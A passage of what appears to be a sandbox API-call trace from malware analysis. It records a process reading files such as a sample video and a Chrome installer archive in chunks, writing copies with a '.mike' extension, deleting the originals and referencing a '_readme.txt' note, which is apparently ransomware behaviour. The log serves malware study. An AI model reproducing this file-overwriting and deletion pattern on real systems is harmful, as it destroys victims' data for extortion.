lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0167.810] WriteFile (in: hFile=0x1c8, lpBuffer=0x22a27f4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22a27f4*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0167.812] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.mike", lpFilePart=0x0) returned 0x36 [0167.813] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.mike", lpFilePart=0x0) returned 0x36 [0167.813] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", dwFileAttributes=0x80) returned 1 [0167.814] DeleteFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv")) returned 1 [0167.820] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0167.824] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0167.824] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0167.824] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0167.824] CoTaskMemFree (pv=0x508980) [0167.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0167.825] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0167.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af344, lpTotalNumberOfBytes=0x2af33c, lpTotalNumberOfFreeBytes=0x2af334 | out: lpFreeBytesAvailableToCaller=0x2af344, lpTotalNumberOfBytes=0x2af33c, lpTotalNumberOfFreeBytes=0x2af334) returned 1 [0167.827] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aee40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0167.828] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeda4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0168.798] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0178.297] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.298] GetFileType (hFile=0x1c8) returned 0x1 [0178.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.298] GetFileType (hFile=0x1c8) returned 0x1 [0178.298] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x413ea20 [0178.298] WriteFile (in: hFile=0x1c8, lpBuffer=0x21d60f0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x21d60f0*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.299] CloseHandle (hObject=0x1c8) returned 1 [0178.299] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.299] GetFileType (hFile=0x1c8) returned 0x1 [0178.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.300] GetFileType (hFile=0x1c8) returned 0x1 [0178.300] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68423680, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4141000 [0178.300] ReadFile (in: hFile=0x1c8, lpBuffer=0x21d8b70, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21d8b70*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.301] CloseHandle (hObject=0x1c8) returned 1 [0178.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.302] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.302] GetFileType (hFile=0x1c8) returned 0x1 [0178.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.302] GetFileType (hFile=0x1c8) returned 0x1 [0178.302] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4141220 [0178.302] WriteFile (in: hFile=0x1c8, lpBuffer=0x21e30d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x21e30d8*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.303] CloseHandle (hObject=0x1c8) returned 1 [0178.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.303] GetFileType (hFile=0x1c8) returned 0x1 [0178.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.303] GetFileType (hFile=0x1c8) returned 0x1 [0178.303] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68433920, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4143800 [0178.303] ReadFile (in: hFile=0x1c8, lpBuffer=0x21e5b58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21e5b58*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.304] CloseHandle (hObject=0x1c8) returned 1 [0178.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.305] GetFileType (hFile=0x1c8) returned 0x1 [0178.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.305] GetFileType (hFile=0x1c8) returned 0x1 [0178.305] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4143a20 [0178.305] WriteFile (in: hFile=0x1c8, lpBuffer=0x21f00c0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x21f00c0*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.305] CloseHandle (hObject=0x1c8) returned 1 [0178.306] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.306] GetFileType (hFile=0x1c8) returned 0x1 [0178.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.306] GetFileType (hFile=0x1c8) returned 0x1 [0178.306] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68444160, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4146000 [0178.306] ReadFile (in: hFile=0x1c8, lpBuffer=0x21f2b40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21f2b40*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.308] CloseHandle (hObject=0x1c8) returned 1 [0178.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.309] GetFileType (hFile=0x1c8) returned 0x1 [0178.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.309] GetFileType (hFile=0x1c8) returned 0x1 [0178.309] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4146220 [0178.309] WriteFile (in: hFile=0x1c8, lpBuffer=0x21fd0a8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x21fd0a8*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.309] CloseHandle (hObject=0x1c8) returned 1 [0178.309] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.310] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.310] GetFileType (hFile=0x1c8) returned 0x1 [0178.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.310] GetFileType (hFile=0x1c8) returned 0x1 [0178.310] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68454400, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4148800 [0178.310] ReadFile (in: hFile=0x1c8, lpBuffer=0x21ffb28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21ffb28*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.311] CloseHandle (hObject=0x1c8) returned 1 [0178.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.312] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.312] GetFileType (hFile=0x1c8) returned 0x1 [0178.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.312] GetFileType (hFile=0x1c8) returned 0x1 [0178.312] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4148a20 [0178.312] WriteFile (in: hFile=0x1c8, lpBuffer=0x220a090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x220a090*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.312] CloseHandle (hObject=0x1c8) returned 1 [0178.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.312] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.313] GetFileType (hFile=0x1c8) returned 0x1 [0178.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.313] GetFileType (hFile=0x1c8) returned 0x1 [0178.313] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68464640, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x414b000 [0178.313] ReadFile (in: hFile=0x1c8, lpBuffer=0x220cb10, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x220cb10*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.314] CloseHandle (hObject=0x1c8) returned 1 [0178.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.314] GetFileType (hFile=0x1c8) returned 0x1 [0178.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.315] GetFileType (hFile=0x1c8) returned 0x1 [0178.315] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x414b220 [0178.315] WriteFile (in: hFile=0x1c8, lpBuffer=0x2217078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x2217078*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.315] CloseHandle (hObject=0x1c8) returned 1 [0178.315] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.315] GetFileType (hFile=0x1c8) returned 0x1 [0178.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.315] GetFileType (hFile=0x1c8) returned 0x1 [0178.316] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68474880, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x414d800 [0178.316] ReadFile (in: hFile=0x1c8, lpBuffer=0x2219af8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2219af8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.316] CloseHandle (hObject=0x1c8) returned 1 [0178.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.317] GetFileType (hFile=0x1c8) returned 0x1 [0178.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.317] GetFileType (hFile=0x1c8) returned 0x1 [0178.317] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x414da20 [0178.317] WriteFile (in: hFile=0x1c8, lpBuffer=0x2224060*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x2224060*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.318] CloseHandle (hObject=0x1c8) returned 1 [0178.318] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.318] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.318] GetFileType (hFile=0x1c8) returned 0x1 [0178.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.318] GetFileType (hFile=0x1c8) returned 0x1 [0178.318] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68485120, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4150000 [0178.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x2226ae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2226ae0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.319] CloseHandle (hObject=0x1c8) returned 1 [0178.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.320] GetFileType (hFile=0x1c8) returned 0x1 [0178.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.320] GetFileType (hFile=0x1c8) returned 0x1 [0178.320] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4150220 [0178.320] WriteFile (in: hFile=0x1c8, lpBuffer=0x2231048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x2231048*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.320] CloseHandle (hObject=0x1c8) returned 1 [0178.320] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.321] GetFileType (hFile=0x1c8) returned 0x1 [0178.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.321] GetFileType (hFile=0x1c8) returned 0x1 [0178.321] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68495360, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4152800 [0178.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x2233ac8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2233ac8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.322] CloseHandle (hObject=0x1c8) returned 1 [0178.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.322] GetFileType (hFile=0x1c8) returned 0x1 [0178.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.322] GetFileType (hFile=0x1c8) returned 0x1 [0178.323] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4152a20 [0178.323] WriteFile (in: hFile=0x1c8, lpBuffer=0x223e030*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x223e030*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.323] CloseHandle (hObject=0x1c8) returned 1 [0178.323] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 